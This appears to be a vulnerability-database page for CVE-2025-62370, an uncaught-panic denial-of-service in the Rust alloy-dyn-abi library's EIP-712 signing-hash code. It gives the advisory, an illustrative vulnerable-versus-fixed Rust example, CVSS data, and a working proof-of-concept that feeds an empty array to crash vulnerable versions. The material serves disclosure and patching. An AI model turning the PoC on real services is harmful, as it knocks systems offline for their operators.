Security Vulnerability Report
CVE-2025-62370 CVSS 7.5 HIGH

CVE-2025-62370

Published: 2025-10-15 16:15:36
Last Modified: 2026-04-15 00:35:42

Description

Alloy Core libraries at the root of the Rust Ethereum ecosystem. Prior to 0.8.26 and 1.4.1, an uncaught panic triggered by malformed input to alloy_dyn_abi::TypedData could lead to a denial-of-service (DoS) via eip712_signing_hash(). Software with high availability requirements such as network services may be particularly impacted. If in use, external auto-restarting mechanisms can partially mitigate the availability issues unless repeated attacks are possible. The vulnerability was patched by adding a check to ensure the element is not empty before accessing its first element; an error is returned if it is empty. The fix is included in version v1.4.1 and backported to v0.8.26.
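The bug and fix shapes the description refers to (an unchecked first-element access that panics on an empty collection, CWE-248, and the patch that checks for emptiness and returns an error instead), written out as an added Rust example. This is not alloy-dyn-abi's code: the `Value` enum, the rule that an array's type string is derived from its first element, and the `TypeError` type are simplified stand-ins constructed for illustration only; the real fix is the commit linked in the references.

```rust
// Added illustration for CVE-2025-62370 (CWE-248, uncaught panic). This is NOT
// alloy-dyn-abi's code: the Value type, the "derive an array's type from its
// first element" rule and the error type are hypothetical, simplified stand-ins
// used to show the bug shape and the fix shape the advisory describes.
use std::fmt;

/// Minimal stand-in for a decoded EIP-712 value (constructed for this example).
#[derive(Debug, Clone, PartialEq)]
pub enum Value {
    Uint(u64),
    Str(String),
    Array(Vec<Value>),
}

/// Error returned by the hardened path instead of panicking.
#[derive(Debug, PartialEq, Eq)]
pub enum TypeError {
    /// An array value carried no elements, so its element type cannot be derived.
    EmptyArray,
}

impl fmt::Display for TypeError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            TypeError::EmptyArray => write!(f, "cannot derive element type of an empty array"),
        }
    }
}

impl std::error::Error for TypeError {}

/// Vulnerable shape: the element type of an array is read from its first element
/// with `items[0]`, which panics on an empty Vec. In a network service that hashes
/// untrusted typed data this is a remote availability loss (AV:N / A:H).
pub fn type_name_unchecked(v: &Value) -> String {
    match v {
        Value::Uint(_) => "uint256".to_string(),
        Value::Str(_) => "string".to_string(),
        // BUG: index 0 on an empty Vec panics with "index out of bounds"
        Value::Array(items) => format!("{}[]", type_name_unchecked(&items[0])),
    }
}

/// Fixed shape, mirroring the advisory's description of the patch: check that the
/// collection is non-empty before touching its first element and return an error
/// (here `TypeError::EmptyArray`) instead of panicking.
pub fn type_name_checked(v: &Value) -> Result<String, TypeError> {
    match v {
        Value::Uint(_) => Ok("uint256".to_string()),
        Value::Str(_) => Ok("string".to_string()),
        Value::Array(items) => {
            // `.first()` yields None for an empty Vec; `ok_or` turns that into Err.
            let first = items.first().ok_or(TypeError::EmptyArray)?;
            Ok(format!("{}[]", type_name_checked(first)?))
        }
    }
}

/// Containment a service can wrap around code it does not control: convert a
/// panic into an Err so one malformed request cannot take the worker down.
/// This only limits blast radius; the actual fix is `type_name_checked`.
pub fn type_name_guarded(v: &Value) -> Result<String, String> {
    std::panic::catch_unwind(|| type_name_unchecked(v))
        .map_err(|_| "encoder panicked on malformed input".to_string())
}

fn main() {
    // Constructed sample inputs: a well-formed array and the malformed empty one.
    let good = Value::Array(vec![Value::Uint(1), Value::Uint(2)]);
    let empty = Value::Array(vec![]);

    println!("checked(good)  = {:?}", type_name_checked(&good));
    println!("checked(empty) = {:?}", type_name_checked(&empty));
    println!("guarded(empty) = {:?}", type_name_guarded(&empty));
    // type_name_unchecked(&empty) would abort this program with an uncaught panic.
}
```

The checked variant is the pattern to look for in review: every `[0]`, `.first().unwrap()` or `.next().unwrap()` on data that arrives from a request is a candidate for the same class of crash, and the cheap test is feeding each such path an empty collection.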

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

alloy-dyn-abi < 0.8.26
alloy-dyn-abi < 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Rust
// CVE-2025-62370 PoC - Triggering DoS via malformed TypedData in alloy-dyn-abi
// This PoC demonstrates how to craft a malicious EIP-712 TypedData payload
// that triggers an uncaught panic in eip712_signing_hash() due to empty array access.
// Cargo dependencies: alloy-dyn-abi (a version before 0.8.26 / 1.4.1) and serde_json.
use alloy_dyn_abi::TypedData;
use serde_json::json;

fn trigger_panic() {
    // Construct a malformed TypedData with an empty array field
    // The empty array will cause eip712_signing_hash() to panic
    // when attempting to access the first element
    let malformed_data = json!({
        "types": {
            "EIP712Domain": [
                {"name": "name", "type": "string"},
                {"name": "version", "type": "string"},
                {"name": "chainId", "type": "uint256"},
                {"name": "verifyingContract", "type": "address"}
            ],
            "Mail": [
                {"name": "contents", "type": "string"},
                {"name": "emptyArray", "type": "uint256[]"}
            ]
        },
        "primaryType": "Mail",
        "domain": {
            "name": "Example",
            "version": "1",
            "chainId": 1,
            "verifyingContract": "0x0000000000000000000000000000000000000000"
        },
        "message": {
            "contents": "Hello",
            // The empty array triggers the panic in eip712_signing_hash()
            "emptyArray": []
        }
    });

    let typed_data: TypedData = serde_json::from_value(malformed_data).unwrap();

    // This call will trigger an uncaught panic, causing DoS
    let _hash = typed_data.eip712_signing_hash().unwrap();
}

fn main() {
    // In a vulnerable version (< 0.8.26 or < 1.4.1), this will crash the process
    trigger_panic();
    println!("This line will never be reached on vulnerable versions");
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62370", "sourceIdentifier": "[email protected]", "published": "2025-10-15T16:15:36.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Alloy Core libraries at the root of the Rust Ethereum ecosystem. Prior to 0.8.26 and 1.4.1, an uncaught panic triggered by malformed input to alloy_dyn_abi::TypedData could lead to a denial-of-service (DoS) via eip712_signing_hash(). Software with high availability requirements such as network services may be particularly impacted. If in use, external auto-restarting mechanisms can partially mitigate the availability issues unless repeated attacks are possible. The vulnerability was patched by adding a check to ensure the element is not empty before accessing its first element; an error is returned if it is empty. The fix is included in version v1.4.1 and backported to v0.8.26."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-248"}]}], "references": [{"url": "https://crates.io/crates/alloy-dyn-abi/0.8.26", "source": "[email protected]"}, {"url": "https://crates.io/crates/alloy-dyn-abi/1.4.1", "source": "[email protected]"}, {"url": "https://github.com/alloy-rs/core/commit/7823e9af8c20e9fcfb5360f5eafd891c457ebccf", "source": "[email protected]"}, {"url": "https://github.com/alloy-rs/core/security/advisories/GHSA-pgp9-98jm-wwq2", "source": "[email protected]"}, {"url": "https://rustsec.org/advisories/RUSTSEC-2025-0073.html", "source": "[email protected]"}]}}